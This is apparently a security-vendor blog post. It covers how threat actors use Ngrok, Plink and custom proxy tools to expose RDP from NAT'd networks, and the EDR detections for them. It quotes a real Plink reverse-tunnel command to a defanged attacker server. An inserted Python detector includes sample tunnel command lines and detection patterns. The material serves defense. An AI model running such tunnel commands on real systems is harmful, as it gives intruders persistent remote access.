Proxy Tools Detected by AhnLab EDR

After gaining control over infected systems, threat actors may also perform remote screen control using RDP. This is partly for convenience but can also serve the purpose of maintaining persistence. If the RDP service is not active during the attack process, threat actors may install RDP Wrappers, steal existing account credentials, or create new backdoor accounts.

However, if the infected system exists within a private network (e.g., behind a NAT environment), remote desktop access from outside becomes impossible even if the IP and account credentials are known. To address this, threat actors often install proxy tools equipped with features that expose the system to external access.

Commonly used tools include Ngrok and Plink, but threat actors may also develop their own tools. For example, groups like Kimsuky and Andariel use self-developed proxy tools during their attacks to control infected systems remotely through RDP. This section covers the proxy tools used in actual attack processes and methods to detect them using AhnLab EDR.

AhnLab Endpoint Detection and Response (EDR) is a next-generation threat detection and response solution that provides threat monitoring, analysis, and response capabilities for endpoints, based on a self-developed, behavior-based engine. AhnLab EDR continuously collects information on suspicious behaviors so that users can precisely perceive threats from a detection, analysis, and response perspective, identify their causes, respond with appropriate measures, and establish processes to prevent recurrence.

Figure 1. AhnLab EDR

1. Ngrok

Ngrok is a tunneling tool that exposes systems within NAT environments to allow external access. It has been frequently used by the Kimsuky group in the past, but it is also utilized by the Andariel group and various other threat actors. Most commands identified in attack cases aim to expose port 3389, which is used for the RDP service, to the outside. [1] [2]

Figure 2. Ngrok used in attacks

The execution of Ngrok is identified as a threat by AhnLab EDR, enabling administrators to quickly detect and take action.

Figure 3. Detecting Ngrok execution behavior using AhnLab EDR

2. Plink

Plink is part of the PuTTY toolset and acts as a Secure Shell (SSH) client. It primarily operates via the command line and is used to establish SSH connections to remote servers or perform port forwarding. Although frequently used for legitimate purposes, its support for proxy features makes it susceptible to misuse by various APT groups and ransomware threat actors.

For instance, in a past attack involving the deployment of LockBit 3.0 ransomware, threat actors exploited Exchange Server vulnerabilities to gain initial access, installed a web shell, and then used a script to activate RDP and install Plink. Subsequently, Plink was executed with the following command to enable external RDP connections through SSH tunneling to the threat actor’s SSH server.

Command
C:\Temp\AUtempR\p64.exe [removed]@172.93.181[.]238 -pw [removed] -P 443 -2 -4 -T -N -C -R 0.0.0.0:10443:127.0.0.1:3389

Table 1. Command used in the attacks

AhnLab EDR identifies Plink activity as a critical behavior, enabling administrators to detect and respond early.

Figure 4. Detecting Plink execution behavior using AhnLab EDR

3. Other Proxy Tools

Threat actors often use known proxy tools, but they also frequently create their own. For example, in attack cases involving the Andariel group [3] [4] or Kimsuky group [5] [6] [7], new proxy tools are often identified. The following is a proxy tool identified in an attack case by the Andariel group, which is the same as the one used by the Lazarus group in 2021.

Figure 5. Proxy tool used by the Andariel Group

The commands used to execute proxy tools show that threat actors primarily use proxies to expose RDP services externally. Some proxy tools have port 3389 hardcoded, while others allow it to be passed as an argument as shown below, though the default port setting remains 3389 in many cases.

Figure 6. Kimsuky group’s proxy tool

AhnLab EDR detects suspicious behavior from proxy tools exposing RDP services externally, identifying them as threats. This enables administrators to detect and respond at an early stage.
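The Plink command in Table 1 and the proxy-tool arguments discussed above share one observable: a tunnel whose target is the local RDP port. The following is an added example (not AhnLab's or the article's code) that applies that idea to process command lines, parsing Plink's `-R` remote-forward specification and Ngrok's `tcp` argument; the sample command lines are constructed, with `p64.exe` as the renamed Plink binary from the LockBit case.

```python
import shlex

RDP_PORT = 3389

# Constructed sample process command lines (not taken from the original post),
# modelled on the Plink and Ngrok usage the article describes.
SAMPLE_CMDLINES = [
    r"C:\Temp\tools\p64.exe backup@192.0.2.10 -pw x -P 443 -2 -4 -T -N -C -R 0.0.0.0:10443:127.0.0.1:3389",
    r"C:\Users\Public\ngrok.exe tcp 3389",
    r"C:\Users\Public\ngrok.exe http 8080",
    r"C:\Tools\plink.exe admin@fileserver -P 22 -L 8080:intranet:80",
]


def plink_remote_forwards(argv):
    """Return (listen_spec, target_host, target_port) for every -R option.

    Plink's -R syntax is [listen-IP:]listen-port:host:port, so the last two
    colon-separated fields are always the forwarding target."""
    forwards = []
    for i, arg in enumerate(argv):
        if arg == "-R" and i + 1 < len(argv):
            parts = argv[i + 1].rsplit(":", 2)
            if len(parts) == 3 and parts[2].isdigit():
                forwards.append((parts[0], parts[1], int(parts[2])))
    return forwards


def classify(cmdline):
    """Return a short finding if the command line exposes RDP, else None.

    The check keys on tunnel arguments rather than the file name, because
    the binary is often renamed (p64.exe in the article's LockBit case)."""
    argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows paths intact
    if not argv:
        return None
    exe = argv[0].rsplit("\\", 1)[-1].lower()
    # Ngrok: "ngrok tcp 3389" publishes the local RDP port through ngrok's relay
    if exe.startswith("ngrok") and "tcp" in argv[1:] and str(RDP_PORT) in argv[1:]:
        return "ngrok tcp tunnel to RDP port"
    # Plink/SSH-style reverse forward whose target is the RDP port
    for listen, host, port in plink_remote_forwards(argv):
        if port == RDP_PORT:
            return f"reverse SSH forward {listen} -> {host}:{port} (RDP)"
    return None


def scan(cmdlines):
    """Map each suspicious command line to its finding; clean ones are omitted."""
    return {c: f for c in cmdlines if (f := classify(c))}
```

A local forward (`-L`) or a non-TCP Ngrok tunnel does not match, so the legitimate-looking Plink and Ngrok lines in the sample pass while the two RDP-exposing ones are flagged.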

Figure 7. Detecting suspicious proxy tools using AhnLab EDR

4. Conclusion

Recent cases of using RDP to control infected systems have been increasing. RDP is not only a major attack vector during initial access processes but is also utilized for maintaining persistence or remote screen control after infection. However, when the infected system exists within a NAT environment, there are limitations to external RDP access. Consequently, threat actors use known proxy tools or create custom tools to expose RDP services externally.

AhnLab EDR collects and displays information about the installation or execution of tools that can be used as proxies, enabling administrators to recognize and respond to suspicious activities. Furthermore, if suspicious proxy tools are installed, AhnLab EDR detects them as threats, assisting administrators in identifying the cause and establishing appropriate response and prevention processes.

Behavior Detection
– Execution/EDR.Ngrok.M11445
– Execution/EDR.Proxy.M12243
– Execution/DETECT.Plink.M12255